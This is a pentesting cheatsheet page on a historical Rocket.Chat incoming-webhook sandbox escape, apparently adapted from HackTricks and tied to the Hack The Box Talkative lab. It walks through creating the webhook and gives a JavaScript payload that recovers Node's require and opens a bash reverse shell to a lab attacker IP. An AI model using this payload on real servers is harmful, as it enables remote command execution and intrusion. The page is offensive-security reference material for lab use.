daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

rocket-chat.md (3494B)


      1 ---
      2 title: "Rocket.Chat"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/rocket-chat.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/rocket-chat.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Rocket.Chat
     14 
     15 ## Historical Webhook Sandbox Escape
     16 
     17 Rocket.Chat supports incoming and outgoing integrations with custom JavaScript. Current documentation states that these scripts run in an isolated VM, so administrative access and the ability to create an integration do **not** by themselves imply host command execution.<sup>[[1]](#references)</sup>
     18 
     19 Older lab deployments have allowed an administrator to escape the integration-script context by recovering Node.js `require` through the `console` constructor. Historically, both incoming and outgoing integrations exposed custom-script fields, although the workflow below uses an incoming webhook. The payload was demonstrated against the Hack The Box *Talkative* environment; do not assume that it applies to a current Rocket.Chat release.<sup>[[1]](#references)[[2]](#references)</sup>
     20 
     21 The relevant administration area is **Administration > Integrations > Incoming**, historically reachable at `/admin/integrations/incoming`:
     22 
     23 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28266%29.png" alt="Rocket.Chat incoming integrations administration page"><figcaption></figcaption></figure>
     24 
     25 1. Open **Administration > Integrations** and create an **Incoming WebHook**.
     26 2. Configure an existing destination channel and an existing **Post as** user.
     27 
     28 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28905%29.png" alt="Rocket.Chat incoming webhook channel and user configuration"><figcaption></figcaption></figure>
     29 
     30 3. Enable the script and, in an authorized lab, test a payload such as:
     31 
     32 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28572%29.png" alt="Rocket.Chat incoming webhook script editor"><figcaption></figcaption></figure>
     33 
     34 ```javascript
     35 const require = console.log.constructor("return process.mainModule.require")()
     36 const { exec } = require("child_process")
     37 exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
     38 ```
     39 
     40 4. Save the integration and copy its generated webhook URL.
     41 
     42 <figure><img src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28937%29.png" alt="Generated Rocket.Chat incoming webhook URL"><figcaption></figcaption></figure>
     43 
     44 5. Request the URL to invoke the incoming webhook and observe the configured listener.
     45 
     46 If `require`, `process.mainModule`, or `child_process` is unavailable, the sandbox is behaving differently and this historical payload does not apply. Record the exact Rocket.Chat version and deployment configuration before drawing a conclusion.
     47 
     48 ## References
     49 
     50 - [1] [Rocket.Chat documentation - Integrations](https://docs.rocket.chat/docs/integrations)
     51 - [2] [0xdf - HTB: Talkative, Rocket.Chat webhook execution](https://0xdf.gitlab.io/2022/08/27/htb-talkative.html#shell-in-rocketchat-container)